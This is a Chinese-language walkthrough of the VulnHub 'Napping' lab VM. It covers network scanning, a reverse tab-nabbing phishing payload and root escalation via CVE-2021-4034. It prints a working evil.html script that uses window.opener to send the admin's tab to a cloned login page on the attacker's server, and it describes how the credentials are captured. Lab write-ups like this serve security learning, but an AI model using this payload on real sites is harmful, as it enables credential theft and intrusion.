記一次釣魚靶機測試

k1115h0t發表於2022-02-28

Napping


攻擊機kali:192.168.0.105

靶機:192.168.0.103(使用virtualbox搭建)

下載地址:https://download.vulnhub.com/napping/napping-1.0.1.ova

一 · 靶機的發現與資訊蒐集:

使用 networkdiscover 掃描當前網段,發現靶機ip為 192.168.0.103
networkdiscover -i eth0 -r 192.168.0.0/24
獲取ip地址後掃描當前靶機開放埠,發現僅開放 22、80埠
nmap -p1-65535 -sV -n -A  192.168.0.103

掃描當前站點web目錄,沒有找到特別的發現。開始在網站的功能點上尋找漏洞
[09:23:44] 200 -    0B  - /config.php
[09:23:48] 200 -    1KB - /index.php
[09:23:48] 200 -    1KB - /index.php/login/
[09:23:50] 302 -    0B  - /logout.php  ->  index.php
[09:23:55] 200 -    2KB - /register.php
[09:23:56] 403 -  278B  - /server-status
訪問當前靶機80埠,註冊後發現站點是一個部落格推廣網站,中間部分能填寫當前部落格的網址。
還有一個重置密碼和一個登出的按鈕,我們留著後面再試

填寫連結後點選按鈕會開啟新標籤頁到填寫連結的地址,使用 dnslog 測試後發現存在ssrf

二 · 漏洞發現

1 · 對管理員的釣魚

(1)檢視頁面原始碼
描述中說到了,所有提交的連結都將由管理員稽核。是否就意味著管理員會檢視提交的 URL 所指向的內容。
檢視頁面原始碼發現應存在一處 Tab Nabbing 漏洞。下面是一個網上找到的比較通俗易懂的解釋:https://kebingzao.com/2020/05/14/a-target-blank/
再來看靶機頁面的原始碼,target="_bank" 說明了此處確實是有可能存在這一個漏洞的。

(2)開始釣魚

​ 使用wget 把登入頁面的原始碼下載下來,然後再製作一個惡意連結。

wget http://192.168.0.103/index.php

​ 我們將惡意的偽造頁面儲存為 index.html ,將含有惡意 js 程式碼的頁面儲存為 evil.html

	釣魚頁面原始碼:
<!DOCTYPE html>
<html>
    <head>
        <title>My Blog</title>
    </head>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.0.104/index.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.0.104/index.html');
</script>
</body>
</html>
隨後將兩個頁面分別放進 /var/www/html 資料夾下,並使用python3開啟 80 埠web服務
python3 -m http.server 80

成功使用 wireshark 看到魚兒上鉤了

三 · 獲取shell並提權

使用獲取的賬號密碼登入 站點後臺,發現密碼錯誤。而後登入 ssh 成功連線。
上傳提權輔助指令碼,下載地址:https://github.com/mzet-/linux-exploit-suggester

成功使用 CVE-2021-4034 提權為root,並進入 root目錄

相關文章